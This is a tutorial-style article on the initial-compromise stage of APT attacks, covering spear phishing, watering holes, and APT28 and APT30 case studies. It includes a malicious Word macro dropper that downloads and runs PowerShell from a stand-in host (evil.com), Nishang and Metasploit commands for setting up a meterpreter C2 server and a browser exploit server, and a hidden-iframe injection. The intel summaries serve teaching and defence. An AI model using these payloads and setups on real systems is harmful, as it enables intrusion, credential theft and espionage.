# [Stages of APT]INITIAL COMPROMISE

In order to gain initial foothold within the target infrastructure APTs drop a malicious program during the point of entry step. While there are multiple ways of deploying malicious payloads the most common cases are malicious email attachments or exploits against the user’s web browser which are embedded into the websites the victim is usually browsing or is forced to browse to [1]. The approach the APTs choose to use depends on the resources they possess or time that is available for carrying out the attack.

One of the most common approaches to deliver malicious payload is by attaching it to a spear phishing email. Depending on the sophistication of APT actors, the attachment might be as simple as macros in a Microsoft office documents or a zero day in a specific software. Another common approach of planting malware is attacking user’s web browser through malicious web sites. In this scenario, a website which the user is usually visiting is compromised and the exploit is embedded. Additionally, an arbitrary web site can be hijacked or created just for this purpose. However, the user is then tricked into visiting this site, mostly via spear phishing email which contains a link. In any case, the exploit tries to exploit a known or Zero-Day vulnerability which then results into malicious code being planted on the target’s computer.

Finally, while other approaches of delivering the malware exist, the end result is the same – attackers gain control of the victim’s machine. It’s worth mentioning, that the malware delivery process might be complex in a way that multiple stages of malicious code are executed. This is mainly done due to specifics of the malicious payload delivery or in order to bypass security defenses which might detect the initial compromise.

Social Engineering

Social Engineering is a broad topic with an overwhelming amount of research released. The science of social engineering is deeply rooted in humans’ psychology and evolution, involving concepts of pathology, genetics, philosophy etc. However, this section focuses only on digital communication, more specifically, Spear-Phishing and Watering Hole attacks as these cases are the most common in APT attacks.

Many of the social engineering tactics focus on understanding, building trust and manipulating individuals based on their assumptions. An understanding of what the target considers as legitimate or trustworthy allows the threat actor to plan accordingly and choose a story that is consistent with these assumptions, thus fraudulently manipulate the thoughts of the target [2].

Phishing describes a technique which is used to psychologically manipulate the user to reveal personally identifiable information and/or network access credentials by opening a malicious file attached to a specially crafted e-mail, clicking a malicious link or just replying to an e-mail with the requested information, exposing sensitive data to a presumably trusted entity. These e-mails are being sent to several hundreds or thousands of people, either randomly selected, or gathered from illegally obtained e-mail lists which can be bought in underground forums.

Spear phishing is another widely used term described as targeted phishing in which only a few or just a single e-mail is sent. These targeted phishing attempts aim to trick a small number of carefully selected users. However, spear phishing can also target a large group of selected individuals instead of just a few. This approach is called mass spear phishing.

APT actors rarely perform mass spear phishing and rather aim for a carefully selected list of targets. Due to the success rate of the spear phishing, APT actors don’t need to increase their success rate by targeting a huge number of victims. Moreover, sending e-mails from the same IP address or with the same subject to a large group of people within the same company increases the likelihood of being detected on the (receiving) mail server and therefore poses a risk for the entire operation to fail. For this reason, a stealth and narrow approach by focusing on few carefully selected targets is preferred by APT actors who aim to reach their goal with a lower chance of detection. The currently described stage in the APT attack chain takes place after proper reconnaissance on the target individual and target organization has been conducted. The reason why the compromise in most APT attacks starts with spear phishing is the advantages of this method compared with others. Apart from the fact that it is not difficult to find the e-mail address of a victim in a short amount of time, the spear phishing method itself does not require advanced techniques and is easy to perform, as described later in this section. Hiding the IP address of the machine sending the mails is initially the only factor the attacker has to take care of. This can be done by using proxies, public Wi-Fi, sending mails from a compromised network and other methods.

To avoid suspicion, APT actors often use a technique called typo-squatting by simply creating an email address just for this purpose and choose a domain name similar to the one they want to impersonate. This can be done by either making small changes in the domain name, like “xzcompany.com” to “xzconpany.com” or just by using the original name as the username on a free email provider: [email protected] Although the last example seems to be easily detectable, a security unaware user might not raise any suspicions.

Spear Phishing Techniques

In most cases initial compromise is performed by approaching a carefully pre-selected victim via a digital communication channel, such as social networks or e-mail. The later one is known to be the most common method used by APT groups. In this case, the victim receives an e-mail with a malicious attachment or a link to a website where, for example, a browser exploit is delivered. Upon a successful exploitation the computer of the victim is infected with initial malware, such as Remote Administration Tool (RAT) of sorts, which allows threat actors to conduct further attacks against the target’s infrastructure.

In the following example a spear phishing email is combined with a Microsoft Word document carrying a malicious Macros code. For this purpose, an Out-Word.ps1 script from Nishang framework is used in order to infect an existing Microsoft Word file. The following commands import the Out-Word.ps1 script and infect Word documents located in the location specified by the WordFileDir:

PS C:\> . .\Out-Word.ps1
PS C:\> Out-Word -PayloadURL https://evil.com:80/exploit -WordFileDir C:\evil

Once the malicious file is created, it is attached to a personalized e-mail which is crafted in such a way that the victim is tricked into opening the attachment. Usually, the sender address is spoofed and content of the mail is referencing to details which were gathered during the reconnaissance phase.  An example shown in Figure 1 illustrates an attempt to impersonate a colleague who is most likely in the team of the targeted victim. Financial or political topics are commonly used in order to make the e-mail more tempting which leads to opening the attachment.

Figure 1: Attacker crafts a Spear Phishing e-mail

Depending on the exploit type, additional interaction after opening the file might be needed. In case of a Word Macros attack social engineering techniques are used within the content of the Word document in order to bypass restrictions as shown in Figure 2.

Figure 2: Social engineering used to trick the user into enabling Macros

If the victim clicks on the “Enable Content” the following VBA code embedded by the Out-Word.ps1 script gets executed.

Sub Execute()
payload = "powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$v=new-object net.webclient;$v.proxy=[Net.WebRequest]::GetSystemWebProxy();$v.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $v.downloadstring('https://evil.com:80/exploit');" Call Shell(payload, vbHide) End Sub Sub Document_Open() Execute End Sub The purpose of this payload, also known as dropper, is to download additional malicious code from the attacker’s server. Using SSL is a common technique as it allows attackers to hide malicious download from network inspection appliances. It is also necessary to make sure that communication happens through any existing corporate firewalls as it’s usually the only way out from the network. Therefore, the provided PowerShell dropper attempts to pre-select the configuration of the system’s proxy and use it for communications. Once the remote host is contacted it returns additional PowerShell code which is executed within the context of the initial process. Further payloads are injected directly into the memory which allows to bypass Anti-Virus solutions because they usually fail to detect this kind of behavior and mainly rely on monitoring file-system changes. Finally, the usage of native tools, such as PowerShell, makes it difficult to detect anomalies as this tool is commonly used by system administrators to manage IT infrastructure and therefore, such an activity blends in and can be used to hide tracks of malicious actions. On the attacker’s side, the Metasploit framework can be used in order to mimic Command and Control (C&C) server which delivers the malware. The following resource script can be used to automatically configure attacker’s server for intercepting dropper’s communication and delivering additional malware. use exploit/multi/script/web_delivery set SRVHOST set SRVPORT 80 set SSL true set URIPATH exploit set TARGET 2 set PAYLOAD windows/meterpreter/reverse_winhttps set LHOST set LPORT 443 exploit -j –z The commands listed above are saved into a resource file (spear_phishing.res) and used to launch the Metasploit’s console as shown below. $ msfconsole –r spear_phishing.res

Configuration of the C&C server is using same techniques as described before: using system’s proxy, common web ports and SSL encryption. These features make the traffic generated by the malware look ordinary and therefore allows attackers to remain undetected.  In cases when the target organization performs Deep Packet Inspection which involves breaking SSL on the perimeter, APT groups might use additional techniques to get out from the compromised networks. Most common techniques are the usage of additional encryption of the data which is being transmitted or the usage of covert channels, such as ICMP and DNS tunneling.

When all the stages of the dropper are completed, attacker gains remote access via the meterpreter’s command line interface. Figure 3 shows a successful connection and basic command execution.

Figure 3: Control channel established

Watering Hole Techniques

In case of a watering hole attack, APT actors try to figure out which site is frequently visited by their targets and what IP ranges they use. Then a vulnerability on the chosen website is found and exploited in order to inject malicious code into the website. This malicious website contains an iframe or a link which redirects a victim to another website where an exploit code, targeting a vulnerability in the victim’s web browser, is deployed. If the exploit succeeds, attacker’s malware is installed on the computer of the victim_._ However, this approach would usually result into infecting other individuals rather than the ones actually targeted. One way to avoid this is to filter the individuals by their IPs and launch the attack only against the victims within the IP range used by the target company.

In order to illustrate this scenario, Metasploit’s Browser Autopwn module will be used. Despite the fact that this is a loud and unsophisticated way to exploit a browser, it is a good starting point to understand the possibilities. The following resource script prepares a server which delivers exploits against known vulnerabilities in Microsoft’s Internet Explorer web browser. In order to simulate a targeted audience, the module is instructed to serve exploits only to an IP address specified by the “AllowedAddresses” parameter.

use auxiliary/server/browser_autopwn2
set SRVHOST 192.168.114.157
set URIPATH /test
set LHOST 192.168.114.157
set include_pattern ms1
exploit –j -z

The commands listed above are saved into a resource file (watering_hole.res) and used to launch the Metasploit’s console as shown below.

\$ msfconsole –r watering_hole.res

Once the Browser Autopwn module is started the list of pre-loaded exploits is shown along with an URL which is further used in the watering hole attack (see Figure 5).

Figure 5: Browser Autopwn server started

To infect the website which targeted people are likely to visit it is sufficient to inject the following HTML code.

<pre><iframe height="0" width="0" src="http://192.168.114.157:8080/test" style="visibility:hidden;display:none"></iframe></pre>


When a targeted user accesses the compromised website attacker’s exploit server fingerprints the user’s browser in order to determine the best match. Then the best exploit is automatically selected and returned to the user via the hidden iframe. In this way the exploitation is invisible for the victim and in the case of success grants the attacker remote access as shown in Figure 6.

Figure 6: Victim’s browser exploited during the Watering hole attack

While the presented example relies on known vulnerabilities and public exploits, in a real world attack APT groups put a lot of effort to obtain Zero-Day Exploits either by developing on their own or buying from the underground market. Moreover, additional techniques are usually implemented in order to bypass security measures, such as Anti-Virus products, Firewalls, software for mitigating unknown vulnerabilities, etc. Finally, Watering hole attacks can be used in combination with spear phishing to make the e-mail appear more trusted by using a link to a known, but infected website. This approach increases the chance that the victim is willing to click on the link to a site he/she visits regularly for business-related tasks. Additionally, infections of Watering hole websites may be limited to a specific time frame in order to lower the chance of detection.

Real World Example: APT28 / Sofacy

The group APT28 mostly relies on Spear-Phishing attacks. During these attacks a specially crafted phishing e-mail is sent with either a malicious attachment or a link to a malicious website. The malicious attachment is usually a Microsoft Office document carrying multistage malware. The links, included in the e-mail, are supposed to lead the victim to infected websites serving a custom exploit-kit, which has been known to deliver Zero-Day browser exploits through iframes. Additionally, some of the links lead to a log-in page of a fake web-mail service hosted on a typo-squatted domain. In some cases of a Spear-Phishing attack, APT28 sends e-mails that contain contextually relevant geopolitical material in order to bait the targeted recipient into opening a weaponized attachment designed to compromise their systems. These attachments exploit vulnerabilities in Microsoft Office which results in malware being installed and a decoy document displayed. A Decoy document makes the victim believe that the opened file is legitimate and therefore serves as a distraction while a backdoor is installed in the background.

For example, in 2014, the group used a zero-day vulnerability (CVE-2014-1761) in Microsoft Word RTF attachments to deliver its malware and display two decoy documents. Later, in 2016, the group used another RTF vulnerability which exploited a Microsoft Office memory corruption vulnerability, identified as CVE-2015-1641, in order to drop a Trojan that loads and executes a Carberp based downloader [3]. However, in this case no decoy document was shown after a successful exploitation. A generic case of Spear-Phishing with malicious attachments is summarized in the following table.

Another type of Spear-Phishing attack performed by APT28 uses typo-squatted domains in order to redirect victims to Outlook Web Access (OWA) portals designed to impersonate a legitimate OWA site of the victim’s company. Targets of this particular method include US defense contractor ACADEMI, Ministry of Defense (France), Ministry of Defense (Hungary), Polish government employees and the OSCE (Austria). The group used phished credentials to obtain sensitive data from their targets instead of using the access for fraud or other financially motivated scams [4]. This technique requires no exploits or vulnerabilities and is simple in its nature. However, the combination of certain TTPs makes this attack effective.

For example, during the attack against Hillary Clinton Presidential Campaign APT28 targeted staff working for or associated with Hillary Clinton’s presidential campaign and the Democratic National Committee (DNC) with Spear Phishing using Bitly service to shorten malicious URLs. Shortened links is an effective tactic, because the targeted individuals usually do not check the final address hidden under such a link. Once clicked, victims were redirected to a URL that spoofed a legitimate Google domain and displayed a fake Google login page to lure the victim into entering their credentials. The APT28 group used social engineering tricks in order to make their targets concerned about unauthorized use of their account using privacy alerts convincing them to change their password which led to login credential disclosure. The following table is provided as a summary of this attack [5].

As a result, accessing compromised Google accounts not only allowed attackers to review internal emails and gather valuable intelligence about their targets, but also potentially gain access to other Google App services used by the targeted organization. Moreover, this access can be used for identifying additional targets and exploit this by generating Spear-Phishing e-mails from internal e-mail addresses which are more likely to succeed.

Finally, some of the initial compromise vectors used by APT28 include exploitation of user’s web browser. It was observed that prior to the 4th quarter of 2014, APT28 seemed to have mostly relied on spear-phishing emails using exploits in Microsoft Office applications. In 2014, the APT28 group began infecting websites and redirect visitors to a custom exploit-kit using iframes in order to deliver exploits which take advantage of vulnerabilities in Internet Explorer [5]. In 2015 it was observed that the group switched to exploiting zero-day vulnerabilities in Adobe Flash and Microsoft Windows using techniques described in the following table [7].

The following table summarizes vulnerabilities that were exploited by APT28’s exploit-kit in a time frame of year 2014 and 2015.

Besides using Zero-Day vulnerabilities in order to attack target’s web browser, a slightly different modus operandi used by APT28 was discovered. In this case the group used Spear-Phishing emails designed to trick users into visiting a malicious site which would prompt to install a bootstrapped Firefox Add-on. This Add-on was based on a publicly available module called “Bootstrapped Addon Social Engineering Code Execution” and was initially developed for the Metasploit framework. According to Mozilla, a bootstrapped Firefox Add-on is a type of an Add-on which can be installed without needing to restart the application. This technique has already been documented and used since 2007. However, this was the first time this technique has been seen in APT28 attacks [3] [8].

Technically this attack starts when victim visits a malicious news site delivered through spear-phishing. After that, a fingerprinting script gets executed on the malicious site which sends information like operating system version, time zone, browser and installed plugins to the attacker. The collected information gets evaluated instantly and if certain criteria are met, the fake news site prompts to install an HTML5 plugin to be able to view the contents of the site. The add-on package carries the main code in the bootstrap.js file which will download the APT28’s Carberp based downloader finally resulting into an executable being dropped onto the victim’s machine.

Real World Example: APT30

For the initial compromise APT30 mainly relies on Spear-Phishing e-mail containing a backdoor with a decoy document which uses topics related to the political situation of Southeast Asia, India and other border areas. According to FireEye, APT30 commonly uses Spear-Phishing e-mail crafted entirely in language of their targets [9]. The tactic of combining a native language spoken by the target and the use of decoy documents makes the attack more likely to succeed and raise less alarms. Additionally, the spear phishing emails were identified to be sent from a trusted email which got compromised or from an e-mail address which was spoofed to look like as if it was sent from a legitimate government’s agency.

As determined by the FireEye, the naming convention of APT30’s backdoor potentially correlates to the way of delivering attacker’s malware. It was concluded that the letter ‘p’ in the backdoor’s version, which is embedded in the malware’s binary, refers to PDF as the delivery document. Accordingly, letter ‘w’ represent Microsoft Office Word documents. To partially prove this idea security firm identified samples with MD5 checksums 7d775a39ecd517cee4369c672e0e4da7 and d2661543c3c456f5fafdd97e31aaff17 to be Word documents exploiting a vulnerability described by a security bulletin CVE-2012-0158 which eventually results in one of the group’s backdoors being installed.

According to FireEye, APT30 pursued members of the ASEAN by using customized information stealing malware and domains that reassembles ASEAN’s legitimate domain for C&C communication. Interestingly, the malware appears to be compiled close to the day of ASEAN events. The following table shows examples of the compile times for these customized BACKSPACE samples in correlation with ASEAN events in 2011 and 2012 [9].

In summary, the APT30 group performs multiple steps during their initial compromise stage. These steps involve initial reconnaissance, customization of malware included in the attachment and finally conducting a tailored Spear-Phishing attack. The next table provides a more detailed information on the execution of initial compromise.

References

1. FireEye, Inc. (2016). Spear-Phishing Attacks.
https://www2.fireeye.com/rs/fireye/images/fireeye-how-stop-spearphishing.pdf

2. Wrightson, T. (2015). Advanced Persistent Threat Hacking – The Art and Science of Hacking any Organization. McGraw-Hill Education.

3. Jarkko, F-Secure. (2015, September 08).
https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/

4. Trend Micro Research Team. (2014). Operation Pawn Storm – Using Decoys to Evade Detection.
https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf

5. SecureWorks Counter Threat Unit™ Threat Intelligence. (2016, June 16).
https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign

6. ESET RESEARCH. (2014, October 08).
http://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-custom-exploit-kit/

7. Fireeye Labs. (2015, April 18).
https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html

8. Hacquebord, F. (2015, April 16).
https://blog.trendmicro.com/trendlabs-security-intelligence/operation-pawn-storm-ramps-up-its-activities-targets-nato-white-house/

9. Fireeye Labs. (2015). APT30 and the mechanics of a long-running cyber espionage operation.
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Categories: